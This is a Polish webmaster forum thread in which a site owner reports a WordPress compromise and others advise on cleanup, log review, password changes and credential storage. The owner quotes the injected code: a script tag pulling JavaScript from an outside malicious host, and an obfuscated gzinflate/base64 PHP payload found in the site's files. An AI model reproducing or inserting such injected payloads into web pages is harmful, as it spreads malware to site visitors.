Skocz do zawartości
Gość bolek10

Włamanie ?

Przez Gość bolek10, w Centrum webmastera

Polecane posty

Gość bolek10   

Gość bolek10
Napisano

Witam, dzisiaj odkryłem włamanie na moją strone.

Strona stoi na skrypcie Word Press.

Dzisiaj wchodząc na nią odkryłem nieprzyjemny komunikat o zablkokowaniu tej strony;/

 

Sprawdziłem i został doklejony kod:

 

<!--pizda--><script type=text/javascript src=http://paysafecard.name/analitics.js?ftpid=47217></script><!--/pizda-->

Co on mógł zrobić? Jak zabezpieczyć skrypt?

Używam filezilli do połączeń ftp, na innych stronach raczej nic nie zauważyłem.

Wtyczki które używam:

All in One SEO Pack

Contact Form 7

Google Analyticator

Google XML Sitemaps

 

TEn kod już usunąłem z plików .php, czy to wystarczy?

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

regdos    1848

regdos
Napisano

Pewnie nie wystarczy bo jak raz Ci to wgrali to i wgrają po raz drugi, trzeba było sprawdzić daty modyfikacji plików a potem logi ftp-a i http w tym czasie żeby namierzyć którędy to się dostało.

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

kcp    41

kcp
Napisano

Na wordpressa jest exploit, mało osób go ma/zna bo nie ma on statusu public.

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Gość bolek10   

Gość bolek10
Napisano

Namierzyłem ten kod również na innej stronce, co teraz zrobić aby tego się pozbyć?

To siedzi u mnie na kompie czy ktoś ma dostęp do serwera?

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

kcp    41

kcp
Napisano

Namierzyłem ten kod również na innej stronce, co teraz zrobić aby tego się pozbyć?

To siedzi u mnie na kompie czy ktoś ma dostęp do serwera?

 

Nie masz kodu źródłowego tego pliku:

http://paysafecard.name/analitics.js?ftpid=47217

?

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

FilipS    7

FilipS
Napisano

Wordpress mimo, że bardzo popularny to jednak nadal bardzo dziurawy skrypt. Włamania tego typu to włamania spowodowane dziurami w oprogramowaniu, nie są spowodowane złym zabezpieczeniem serwera. Ważne jest aby na bieżąco go aktualizować, możesz zmienić też login ze standardowego "admin" na coś innego. Aby pozbyć się wirusa nadpisz instalację wordpressa (oczywiście bez pliku wp-config.php) i/lub nadpisz wszystkie biblioteki js wtyczek.

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

regdos    1848

regdos
Napisano

Następna złota rada. Nadpisze pliki i co dalej? Za tydzień znowu mu się ktoś włamie bo nie znajdzie przyczyny.

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Gość bolek10   

Gość bolek10
Napisano

Na innych stronach znalazłem również inne niespodzianki, np.

#d93065#

echo(gzinflate(base64_decode("3U5LDsIgFLwKeZvqphjdKXAKL4AUy2sQyOvD2ttL7S2c1WQyPyH+A2p2hIUFr8VrYP9hOdm33VUwQ3b15RP3CyH7Q6fwSfblxUxOQ2AuVykpx3VaY09VulwTX059CQVEakYN9wWZPYFolTlGTKMGWzmD+DU9Mg2eNKQm2Ihj0uDa3hYIHsfAGs4gFhw4bMwouT8w3fGm5H7TfAE=")));

#/d93065#

 

Patrzyłem na daty modyfikacji plików, później w logi.

Ktoś logował się do ftp z kilku ip, w różne dni.

Co dziwne, są przypadki że w jednej minucie w ftp siedzą 2-3 osoby.

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

kcp    41

kcp
Napisano (edytowany)

Wcale wordpress nie jest taki dziurawy. Exploit był ale już nie działa.

Pozmieniaj hasła.

 

Jest i działa ale nie public.

 

Jeśli chodzi o włamanie. Przeanalizowałem kodzik i wywnioskuje tak:

Ściągnąłeś złośliwe oprogramowaniem, które rozszyfrowało zapisane na twoim komputerze hasła do serwerów FTP, połączyło się z nimi, a następnie dokleiło do plików index złośliwy JavaScript, który próbuje infekować internautów wirusami, utrzymać access w celu wykonania deface lub użycie serwera do ataków DDoS (dodanie do botneta). Radziłbym formacik i zmianę haseł.

Edytowano przez kcp (zobacz historię edycji)

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Gość bolek10   

Gość bolek10
Napisano

Jest i działa ale nie public.

 

Jeśli chodzi o włamanie. Przeanalizowałem kodzik i wywnioskuje tak:

Ściągnąłeś złośliwe oprogramowaniem, które rozszyfrowało zapisane na twoim komputerze hasła do serwerów FTP, połączyło się z nimi, a następnie dokleiło do plików index złośliwy JavaScript, który próbuje infekować internautów wirusami, utrzymać access w celu wykonania deface lub użycie serwera do ataków DDoS (dodanie do botneta). Radziłbym formacik i zmianę haseł.

Co do wirusa to bardzo możliwe gdyż używam winXP bez zabezpieczeń, system zaraz reinstaluję ale na ubuntu/debiana bo dosyć już mam tych winszitów.

Dziękuję wszystkim za pomoc ;)

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Gargoyle    1

Gargoyle
Napisano

Co do wirusa to bardzo możliwe gdyż używam winXP bez zabezpieczeń, system zaraz reinstaluję ale na ubuntu/debiana bo dosyć już mam tych winszitów.

Dziękuję wszystkim za pomoc wink.png

Sądząc po podejściu do zabezpieczeń (świadome używanie systemu sprzed paru lat bez zabezpieczeń) na Linuxie prędzej czy później sam sobie dołek wykopiesz ;)

 

 

A na przyszlosc- nie zapisuj hasel w zadnych programach tylko uzywaj KeePass'a i w nim chowaj loginy/hasla i zabezpiecz dostep do bazy silnym haslem + plikiem kluczowym.

  • Upvote 1

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się
Przejdź do listy tematów Centrum webmastera
×